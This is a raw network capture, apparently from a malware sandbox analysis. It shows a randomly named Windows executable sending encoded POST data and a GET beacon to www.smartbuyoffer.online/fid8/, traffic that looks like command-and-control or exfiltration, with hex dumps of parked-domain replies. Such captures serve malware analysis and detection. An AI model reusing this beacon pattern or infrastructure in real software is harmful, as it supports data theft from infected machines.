Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m
Nov 12, 2024 15:32:07.100459099 CET	1289	IN	Data Raw: 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38 Data Ascii: argin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:60
Nov 12, 2024 15:32:07.100505114 CET	1289	IN	Data Raw: 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f Data Ascii: ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;lin
Nov 12, 2024 15:32:07.100550890 CET	1289	IN	Data Raw: 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 Data Ascii: ze:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:
Nov 12, 2024 15:32:07.100594044 CET	1289	IN	Data Raw: 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f Data Ascii: -graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidde
Nov 12, 2024 15:32:07.100739956 CET	1289	IN	Data Raw: 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d Data Ascii: Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article
Nov 12, 2024 15:32:07.100749016 CET	1289	IN	Data Raw: 54 46 2d 31 36 20 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d Data Ascii: TF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023\|55296)),r=56320\|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;
Nov 12, 2024 15:32:07.100750923 CET	1289	IN	Data Raw: 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 76 61 72 20 68 2c 66 2c 69 2c 63 2c 75 Data Ascii: harCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.11.20	49756	108.179.252.152	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:12.400964022 CET	771	OUT	POST /fid8/ HTTP/1.1 Host: www.smartbuyoffer.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.smartbuyoffer.online Referer: http://www.smartbuyoffer.online/fid8/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 65 6e 68 56 6a 49 33 75 41 65 45 36 79 2f 58 74 34 6a 75 39 52 73 33 30 43 30 34 4e 46 44 7a 41 70 69 53 70 4a 48 6a 69 33 36 35 55 41 59 36 45 42 4c 72 6b 68 2b 46 64 50 74 6e 71 44 58 73 74 56 39 36 74 6d 6c 55 34 34 39 52 72 36 50 70 38 73 6d 33 50 54 38 71 6b 36 52 55 6b 37 65 5a 58 33 66 77 6c 6f 2f 46 31 67 52 42 4a 4c 45 33 4e 41 48 50 6c 4f 43 5a 5a 53 6a 66 4c 65 6c 71 42 35 6f 4d 50 49 74 76 52 2f 74 51 58 2f 4e 31 57 67 6c 6d 37 58 73 4d 57 4b 79 49 35 54 77 50 37 6b 73 34 7a 6e 42 31 62 6f 54 32 55 4b 46 37 43 6a 59 67 77 65 4c 78 76 69 41 42 66 52 43 2b 73 62 77 3d 3d Data Ascii: mRu=enhVjI3uAeE6y/Xt4ju9Rs30C04NFDzApiSpJHji365UAY6EBLrkh+FdPtnqDXstV96tmlU449Rr6Pp8sm3PT8qk6RUk7eZX3fwlo/F1gRBJLE3NAHPlOCZZSjfLelqB5oMPItvR/tQX/N1Wglm7XsMWKyI5TwP7ks4znB1boT2UKF7CjYgweLxviABfRC+sbw==
Nov 12, 2024 15:32:12.533979893 CET	1121	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:32:12 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 04 Oct 2022 14:01:30 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 836 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED] Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1LuD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p\| 8J8-QXXD,B"^#n$uP"8\|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.11.20	49757	108.179.252.152	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:15.058449984 CET	791	OUT	POST /fid8/ HTTP/1.1 Host: www.smartbuyoffer.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.smartbuyoffer.online Referer: http://www.smartbuyoffer.online/fid8/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 65 6e 68 56 6a 49 33 75 41 65 45 36 39 2b 6e 74 36 42 47 39 47 63 33 33 62 55 34 4e 4f 6a 7a 2b 70 69 4f 70 4a 47 6d 2f 30 4d 52 55 41 34 4b 45 47 4b 72 6b 69 2b 46 64 57 64 6d 75 48 58 73 51 56 39 32 6c 6d 6b 6f 34 34 39 46 72 36 4f 5a 38 73 52 44 4d 52 73 71 6d 79 78 55 6d 32 2b 5a 58 33 66 77 6c 6f 2b 67 69 67 56 74 4a 4b 31 48 4e 42 6d 50 6d 4e 43 59 72 45 54 66 4c 61 6c 71 46 35 6f 4d 68 49 73 6a 72 2f 6f 55 58 2f 4e 46 57 6e 30 6d 34 65 73 4e 64 4f 79 4a 65 61 54 57 74 6b 2b 55 42 72 42 68 63 73 47 36 63 47 7a 32 59 2b 71 55 55 64 59 74 64 6d 77 34 33 54 41 2f 33 47 36 42 46 79 54 4a 50 37 77 6b 6d 4d 35 78 57 53 5a 47 57 43 5a 73 3d Data Ascii: mRu=enhVjI3uAeE69+nt6BG9Gc33bU4NOjz+piOpJGm/0MRUA4KEGKrki+FdWdmuHXsQV92lmko449Fr6OZ8sRDMRsqmyxUm2+ZX3fwlo+gigVtJK1HNBmPmNCYrETfLalqF5oMhIsjr/oUX/NFWn0m4esNdOyJeaTWtk+UBrBhcsG6cGz2Y+qUUdYtdmw43TA/3G6BFyTJP7wkmM5xWSZGWCZs=
Nov 12, 2024 15:32:15.183222055 CET	1121	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:32:15 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 04 Oct 2022 14:01:30 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 836 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED] Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1LuD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p\| 8J8-QXXD,B"^#n$uP"8\|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.11.20	49758	108.179.252.152	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:17.714005947 CET	1289	OUT	POST /fid8/ HTTP/1.1 Host: www.smartbuyoffer.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.smartbuyoffer.online Referer: http://www.smartbuyoffer.online/fid8/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 65 6e 68 56 6a 49 33 75 41 65 45 36 39 2b 6e 74 36 42 47 39 47 63 33 33 62 55 34 4e 4f 6a 7a 2b 70 69 4f 70 4a 47 6d 2f 30 4d 5a 55 41 4a 71 45 47 70 54 6b 6a 2b 46 64 4a 74 6d 74 48 58 73 33 56 2b 47 68 6d 6b 6b 6f 34 2b 39 72 37 73 68 38 71 67 44 4d 62 73 71 6d 2b 52 55 72 37 65 5a 43 33 66 67 70 6f 2b 77 69 67 56 74 4a 4b 33 66 4e 58 48 50 6d 4c 43 5a 5a 53 6a 65 4b 65 6c 72 69 35 70 6b 58 49 73 6d 55 2f 62 63 58 2f 74 56 57 6d 47 4f 34 47 38 4e 66 4a 79 4a 47 61 54 72 7a 6b 2b 49 37 72 42 56 32 73 42 65 63 46 69 54 6e 71 49 41 67 42 34 74 75 6d 52 45 54 51 78 6a 4c 4a 64 46 64 37 68 74 44 34 58 34 4d 43 76 39 63 43 73 47 68 51 65 30 56 6a 50 41 77 70 2b 59 62 76 74 54 6e 30 71 61 71 47 72 33 53 70 6f 32 53 65 32 62 70 65 32 46 53 7a 34 46 63 71 6e 2b 71 35 42 47 75 7a 57 52 59 61 34 66 33 72 31 44 39 38 58 6a 70 6b 4d 45 6b 57 69 68 43 65 79 63 43 38 78 36 57 41 6f 47 6a 30 64 46 49 4d 31 54 7a 5a 7a 6b 65 63 62 49 43 48 52 66 32 70 4c 50 55 33 35 6f 6b 56 32 58 47 79 58 49 73 4a 75 [TRUNCATED] Data Ascii: mRu=enhVjI3uAeE69+nt6BG9Gc33bU4NOjz+piOpJGm/0MZUAJqEGpTkj+FdJtmtHXs3V+Ghmkko4+9r7sh8qgDMbsqm+RUr7eZC3fgpo+wigVtJK3fNXHPmLCZZSjeKelri5pkXIsmU/bcX/tVWmGO4G8NfJyJGaTrzk+I7rBV2sBecFiTnqIAgB4tumRETQxjLJdFd7htD4X4MCv9cCsGhQe0VjPAwp+YbvtTn0qaqGr3Spo2Se2bpe2FSz4Fcqn+q5BGuzWRYa4f3r1D98XjpkMEkWihCeycC8x6WAoGj0dFIM1TzZzkecbICHRf2pLPU35okV2XGyXIsJuxLKkGYHhKzEVdsPV+WNDVYaxEDxAV7b4aKZzDuMT4BrgxorJKUyqTNxn1YObmc+C8ka8Tkp5f1MibgloezNzyn14OPfP9OWxNZxIwMzkyMq3BvYwA2+1uZ/BpLvOoWMkI2cniypY2jqLTa8HivyaLHaYRtwEJXQT0L9XN3oWps5n1zjXcgfloH/uwGCbL2mTa/kSqtgJtxtg+EiE0D0ypdIo430lmJhS8Lvj0gp3VJsVugCtjkyX35Aek7iPD9LMxKaTTSPk7RTyPnnpcJSLOt4GL5IEOsrpFNIqTffqePGdSzjmlkWdlBzhaQFAmWBU0ftXFtFIqcGYMJ2A1PUOlL9zIV/hhy3S1vptYqp58JvaSoAz7GE6Pb/um6P
Nov 12, 2024 15:32:17.714052916 CET	1289	OUT	Data Raw: 72 52 6b 49 62 6e 66 35 36 4c 45 76 50 43 34 4a 53 52 44 49 71 73 79 41 46 6c 56 6a 4d 6e 71 54 38 78 37 79 4e 56 63 73 4e 57 2b 49 34 4b 2f 6f 70 5a 57 39 33 63 49 57 79 30 52 6b 49 72 4d 47 31 58 69 50 50 6a 52 6c 48 6e 79 5a 4c 72 6a 6a 6e 50 Data Ascii: rRkIbnf56LEvPC4JSRDIqsyAFlVjMnqT8x7yNVcsNW+I4K/opZW93cIWy0RkIrMG1XiPPjRlHnyZLrjjnPo0lXHEqtPYeLNrvZ8bZdv3PmKIZjjuKRlRJKDeyv6EWYnd6zh0tzj6f8wAs9p2ngBsgS8uxisC4gqRDqRtrUFXDWZdTpVpGEpH0Wu6M6fjQcsKa6S2ToLsJgNdMuCFdYH9zifCSRnI8b4H33zIPEytyak1XHFr7TD
Nov 12, 2024 15:32:17.714103937 CET	5362	OUT	Data Raw: 74 35 57 52 44 54 69 51 74 4d 50 57 30 53 61 48 35 4c 73 36 39 57 4d 6d 38 71 78 6b 4f 4f 49 64 68 76 77 38 7a 4e 7a 6a 38 39 79 65 50 6e 70 63 33 64 52 42 4c 66 4d 53 58 70 38 52 51 44 55 53 77 54 34 76 74 37 5a 50 50 55 47 30 36 4f 52 63 6f 77 Data Ascii: t5WRDTiQtMPW0SaH5Ls69WMm8qxkOOIdhvw8zNzj89yePnpc3dRBLfMSXp8RQDUSwT4vt7ZPPUG06ORcowGNTXYgW3uTallsZsCxq2Pj0TuK7zlKGsUI9nO5auyG0Z8lVSOdOCbpvviFJMp7BGTLMzPE4qKsW9w0W9RdOcZ/BU2Oli7hHvtXmB6KkEFE1IbJz73Qd+G3nPcnX4ufCZrNZGs/iZBU91rBkoTOM3odJXZQhxdq/uZ
Nov 12, 2024 15:32:17.840478897 CET	1121	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:32:17 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 04 Oct 2022 14:01:30 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 836 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED] Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1LuD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p\| 8J8-QXXD,B"^#n$uP"8\|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.11.20	49759	108.179.252.152	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:20.360177040 CET	483	OUT	GET /fid8/?mRu=TlJ1g/LEHcod8cWOxAq9FP73H09YVH7WgnCIHnyD26ULKZOEEsjMueNmMu+sImVaRLKPh0l5mf17vNoqkS6RVPulxmIy09RerMB73PEzvxMXDGvmWRP6LAE=&UJ=7H1XM HTTP/1.1 Host: www.smartbuyoffer.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:32:20.485378981 CET	1289	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:32:20 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 04 Oct 2022 14:01:30 GMT Accept-Ranges: bytes Content-Length: 2361 Vary: Accept-Encoding Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192"> <link rel="apple-touch-icon" [TRUNCATED]
Nov 12, 2024 15:32:20.485502005 CET	1289	IN	Data Raw: 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e Data Ascii: images/favicons/favicon-120.png" sizes="120x120"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x1
Nov 12, 2024 15:32:20.485512018 CET	45	IN	Data Raw: 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: </div> </div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.11.20	49760	13.248.169.48	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
